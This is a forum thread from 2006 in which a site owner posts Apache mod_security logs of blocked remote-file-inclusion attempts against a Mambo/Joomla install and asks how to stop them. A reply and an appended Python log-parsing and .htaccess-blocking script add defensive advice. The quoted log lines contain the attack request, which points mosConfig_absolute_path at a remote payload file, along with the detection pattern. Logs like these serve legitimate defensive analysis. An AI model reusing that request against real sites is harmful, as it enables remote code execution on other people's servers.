Please help with these attempted intrusions


#1

Is there anything I can do to stop these turds from trying to get into my machine? They seem to be failing, but they just won’t stop. Can I contact someone at the domain? On my domain, I’m listed as the abuse contact, so I don’t think it will help. Any suggestions?

More of the same here: http://benconley.net/errorlog.txt

[Sun Oct 8 12:14:17 2006] [error] [client 66.226.72.30] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at REQUEST_URI [severity “EMERGENCY”] [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?”]
[Sun Oct 8 23:12:29 2006] [error] [client 72.51.38.231] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at REQUEST_URI [severity “EMERGENCY”] [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?”]
[Sun Oct 8 23:12:30 2006] [error] [client 66.235.219.118] mod_security: Access denied with code 503. Pattern match “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)” at REQUEST_URI [severity “EMERGENCY”] [hostname “benconley.net”] [uri “/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?”]

http://benconley.net
http://teamshocker.com


#2

That’s a rough one, alright. You’d think they would quickly realize you are adequately “patched” and that Mambo/Joomla! exploit is not gonna work on your site, and then move on.

I suppose if they are all coming from the same IP address, or from just a few addresses, you could block the IPs via .htaccess. Other than that I don’t know what to suggest. I’ve been pretty lucky in that the few attempts of this nature that my sites have been exposed to were in short bursts of activity that then went away.

A look at whois for the site serving the exploit code shows a couple of opportunities to screw with the guy - he is hosted by a California-based Web host, and uses a gmail account. I think it quite likely that your error logs could get him booted for TOS/AUP abuse in each of those environments, if you want to go after him :wink: .

–rlparker
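The two posts together describe a small defender's workflow: read the mod_security "Access denied" lines out of the Apache error log, pull out the remote URL the rule fired on (the mosConfig_absolute_path remote-file-inclusion payload), and, if the same addresses keep coming back, turn the offender list into .htaccess deny rules. The script below is an added example written for this thread, not code posted by either participant. It runs over constructed sample lines modelled on the three entries quoted in post #1 (same client IPs and URI) plus one unrelated error line that should be ignored; the 192.0.2.10 address in that extra line is a documentation address, not a real client. The .htaccess output uses the Apache 2.2 `Order`/`Allow`/`Deny` syntax of the period; the names `parse_denials`, `remote_includes`, `payload_hosts`, `count_by_ip` and `htaccess_block` are this example's own.

```python
"""Summarise mod_security 'Access denied' entries from an Apache error log and
emit an Apache 2.2-style .htaccess deny list for repeat offenders."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log: three lines modelled on the thread's entries plus one
# ordinary error line that is not a mod_security denial and must be skipped.
SAMPLE_LOG = "\n".join([
    '[Sun Oct 8 12:14:17 2006] [error] [client 66.226.72.30] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "benconley.net"] [uri "/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?"]',
    '[Sun Oct 8 23:12:29 2006] [error] [client 72.51.38.231] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "benconley.net"] [uri "/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?"]',
    '[Sun Oct 8 23:12:30 2006] [error] [client 66.235.219.118] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "benconley.net"] [uri "/cms/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yagenoysentoplesen.com/spread.txt?"]',
    # Constructed non-matching line (192.0.2.10 is an RFC 5737 documentation address).
    '[Sun Oct 8 23:15:02 2006] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico',
])

# mod_security 1.x error-log shape: timestamp, [error], [client IP], then the
# denial message; the offending request path lives in the trailing [uri "..."].
DENIAL_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[0-9.]+)\] '
    r'mod_security: Access denied with code (?P<code>\d+)\..*?'
    r'\[uri "(?P<uri>[^"]+)"\]'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def remote_includes(uri):
    """Query parameters whose value is a remote URL: the RFI payload the rule caught."""
    query = urlsplit(uri).query
    return {k: v for k, v in parse_qsl(query) if v.lower().startswith(REMOTE_SCHEMES)}


def parse_denials(log_text):
    """Return one dict per mod_security denial; other error-log lines are ignored."""
    events = []
    for line in log_text.splitlines():
        m = DENIAL_RE.match(line)
        if not m:
            continue  # e.g. a plain 'File does not exist' entry
        events.append({
            "ts": m["ts"],
            "ip": m["ip"],
            "code": int(m["code"]),
            "uri": m["uri"],
            "remote_includes": remote_includes(m["uri"]),
        })
    return events


def count_by_ip(events):
    """Denials per client address, so repeat offenders stand out."""
    return Counter(e["ip"] for e in events)


def payload_hosts(events):
    """Hosts serving the injected files: the abuse-report target, not the scanning IPs."""
    return {urlsplit(v).hostname for e in events for v in e["remote_includes"].values()}


def htaccess_block(ip_counts, min_hits=1):
    """Apache 2.2-style deny list for addresses seen at least min_hits times."""
    offenders = sorted(ip for ip, n in ip_counts.items() if n >= min_hits)
    lines = ["Order Allow,Deny", "Allow from all"]
    lines += [f"Deny from {ip}" for ip in offenders]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    found = parse_denials(SAMPLE_LOG)
    print(f"{len(found)} denials from {len(count_by_ip(found))} addresses")
    print("payload hosts:", ", ".join(sorted(payload_hosts(found))))
    print(htaccess_block(count_by_ip(found), min_hits=2) or "(no repeat offenders)")
```

Run against a real error log with `parse_denials(open("error_log").read())`. Note that in the three quoted entries each request came from a different address, so with `min_hits=2` the deny list is empty: per-IP blocking only helps against the repeat offenders post #2 has in mind, while the mod_security rule is what actually stops each request. The host returned by `payload_hosts` is the one to name in an abuse report, since that is where the injected file is being served from.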